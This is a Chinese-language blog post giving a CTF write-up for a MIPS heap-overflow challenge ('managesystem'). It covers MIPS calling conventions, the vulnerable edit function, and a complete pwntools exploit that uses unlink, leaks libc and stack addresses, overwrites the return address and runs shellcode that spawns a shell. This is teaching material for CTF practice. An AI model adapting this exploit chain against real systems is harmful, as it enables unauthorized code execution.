mipspwn

mipspwn

最近遇到的异架构的pwn题越来越多了，也是未来pwn的发展趋向，决定入坑一下，就从西湖论剑的一道mipspwn开始进入mips的世界吧:)

mips构架下的pwn和x86的pwn主要区别在于寄存器，指令集的区别。网上博客挺多的，我主要说下常见到的点（会不断补充的）：

1.a0,a1,a2寄存器用来函数的传参，多的用栈传递。

2.fp类似rbp但有又不同，ret_addr在fp-4，存储上一个栈帧的位置为fp-8。sp相当于rsp。

3.mips常用shellcode的地址覆盖返回地址来拿shell。

4.qemu-user起的mipspwn题的地址是固定的(动态链接库什么的除外)，且一般保护措施都没开启。

西湖论剑managesystem

mips下pwn静态分析用ghidra，ida反编译不了0.0

这题漏洞很明显：

puts("Enter the index of user you want edit: ");
scanf("%d",&iStack12);
if ((iStack12 < 0) || (0x10 < iStack12)) {
  puts("No!");
}
else {
  if (*(int *)(note_list + iStack12 * 8) == 0) {
    puts("Nothing!");
  }
  else {
    puts("The new user\'s info: ");
    sVar1 = read(0,*(void **)(note_list + iStack12 * 8),*(int *)(note_list + iStack12 * 8 + 4)+ 8);   //堆溢出可覆盖next_chunk的size
    if (sVar1 < 0) {
      puts("Some error happened!");
                  /* WARNING: Subroutine does not return */
      exit(0);
    }
    puts("Edit compl
  }

这就好办了，直接unlink。

先add4次，最后一个chunk存放shellcode，然后在chunk1里构造fake_chunk同时改next_chunk的inuse位，mips下是直接size-1即可，之后dele掉chunk2，触发unlink。
效果：

pwndbg> telescope 0x00411830
00:0000│   0x411830 (note_list) —▸ 0x412008 ◂— 'aaaaaaaaaaaaaaaaaaaaaaa'
01:0004│   0x411834 (note_list+4) ◂— 0x24 /* '$' */
02:0008│   0x411838 (note_list+8) —▸ 0x411830 (note_list) —▸ 0x412008 ◂— 'aaaaaaaaaaaaaaaaaaaaaaa'   //unlink
03:000c│   0x41183c (note_list+12) ◂— 0x34 /* '4' */
04:0010│   0x411840 (note_list+16) —▸ 0x412068 ◂— 'ccccccccccccccccccccccc'
05:0014│   0x411844 (note_list+20) ◂— 0x34 /* '4' */
06:0018│   0x411848 (note_list+24) —▸ 0x4120a0 ◂— lui    $t1, 0x6962 /* 0x3c096962 */
07:001c│   0x41184c (note_list+28) ◂— 0x84

之后edit(1)来控制chunk0的指针，配合show泄露libc(用的free_got)，和stack(用的env(libc里的env)环境变量指针)。

然后偏移得到ret_addr，之后edit改chunk0_ptr位ret_addr，再edit(0)改返回地址为存放shellcode的chunk地址。

exp:

from pwn import *
context.log_level='debug'
context.arch='mips'

def cmd(c):
	p.sendafter("options >> ",str(c)*2)

def add(sz,content):
	cmd(1)
	p.sendlineafter("length: ",str(sz))
	p.sendafter("info: ",content)

def dele(idx):
	cmd(2)
	p.sendlineafter(": ",str(idx))

def edit(idx,content):
	cmd(3)
	p.sendlineafter(": ",str(idx))
	p.sendafter("info: ",content)

def show(idx):
	cmd(4)
	p.sendlineafter(": ",str(idx))

def main(host,port=1234):
	global p
	if host:
		p=remote(host,port)
	else:
		p=process(['./qemu-mipsel-static', '-L', './', '-g', '1234', './managesystem'])

	add(0x24,'a'*0x18)
	add(0x34,'b'*0x18)
	add(0x34,'c'*0x18)

	sc=asm(shellcraft.sh(),endian='little')
	add(0x84,sc+'a')

	node_list=0x00411830
	payload=p32(0)+p32(0x31)+p32(node_list+8-0xc)+p32(node_list+8-0x8)
	payload=payload.ljust(0x30,'\x00')
	payload+=p32(0x30)+p32(0x38)
	edit(1,payload)
	dele(2)
	edit(1,p32(0x04117B4))
	show(0)
	p.recvuntil("info: ")
	libc = u32(p.recv(4))-0x0056B68
	info("libc"+hex(libc))
	edit(1,p32(libc+0x007AE90))  #env ->stack
	show(0)
	p.recvuntil("info: ")
	stack=u32(p.recv(4))
	info("stack"+hex(stack))

	ret=stack-0x158
	edit(1,p32(ret))
	edit(0,p32(0x4120a0))
	cmd(5)

	p.interactive()

if __name__ == '__main__':
	main(0)

赏

谢谢你请我吃糖果